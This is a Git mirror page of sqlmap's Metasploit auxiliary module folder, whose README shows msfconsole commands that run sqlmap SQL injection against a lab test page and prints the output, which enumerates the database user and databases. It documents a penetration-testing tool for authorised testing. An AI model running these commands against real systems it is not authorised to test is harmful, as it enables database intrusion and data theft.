sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 09:36:35 +03:00
Code Issues Packages Projects Releases Wiki Activity
e5aa557bd4
sqlmap/extra/msfauxmod
History
Bernardo Damele 8e3eb45510 After the storm, a restore..
2008-10-15 15:38:22 +00:00
..
README After the storm, a restore.. 2008-10-15 15:38:22 +00:00
wmap_sqlmap.rb After the storm, a restore.. 2008-10-15 15:38:22 +00:00

README 

To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
the example below:

$ ./msfconsole

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ msf v3.2-testing
+ -- --=[ 308 exploits - 173 payloads
+ -- --=[ 20 encoders - 6 nops
       =[ 75 aux

msf > use auxiliary/scanner/http/wmap_sqlmap 
msf auxiliary(wmap_sqlmap) > set RHOSTS 192.168.1.121
RHOSTS => 192.168.1.121
msf auxiliary(wmap_sqlmap) > set PATH /sqlmap/mysql/get_int.php
PATH => /sqlmap/mysql/get_int.php
msf auxiliary(wmap_sqlmap) > set QUERY id=1
QUERY => id=1
msf auxiliary(wmap_sqlmap) > set OPTS '--dbs --current-user'
OPTS => --dbs --current-user
msf auxiliary(wmap_sqlmap) > set SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py
msf auxiliary(wmap_sqlmap) > show options 

Module options:

   Name         Current Setting                                      Required  Description
   ----         ---------------                                      --------  -----------
   BATCH        true                                                 yes       Never ask for user input, use the default behaviour
   DATA                                                              no        The data string to be sent through POST
   METHOD       GET                                                  yes       HTTP Method
   OPTS         --dbs --current-user                                 no        The sqlmap options to use
   PATH         /sqlmap/mysql/get_int.php                            yes       The path/file to test for SQL injection
   Proxies                                                           no        Use a proxy chain
   QUERY        id=1                                                 no        HTTP GET query
   RHOSTS       192.168.1.121                                        yes       The target address range or CIDR identifier
   RPORT        80                                                   yes       The target port
   SQLMAP_PATH  /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py  yes       The sqlmap >= 0.6.1 full path
   SSL          false                                                no        Use SSL
   THREADS      1                                                    yes       The number of concurrent threads
   VHOST                                                             no        HTTP server virtual host

msf auxiliary(wmap_sqlmap) > run
[*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121/sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
SQLMAP: 
SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
SQLMAP: 
SQLMAP: [*] starting at: 01:31:41
SQLMAP: 
SQLMAP: [01:31:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
SQLMAP: back-end DBMS:  MySQL >= 5.0.0
SQLMAP: 
SQLMAP: current user:    'testuser@localhost'
SQLMAP: 
SQLMAP: available databases [4]:
SQLMAP: [*] information_schema
SQLMAP: [*] mysql
SQLMAP: [*] privatedb
SQLMAP: [*] test
SQLMAP: 
SQLMAP: 
SQLMAP: [*] shutting down at: 01:31:44
SQLMAP: 
[*] Auxiliary module execution completed
msf auxiliary(wmap_sqlmap) >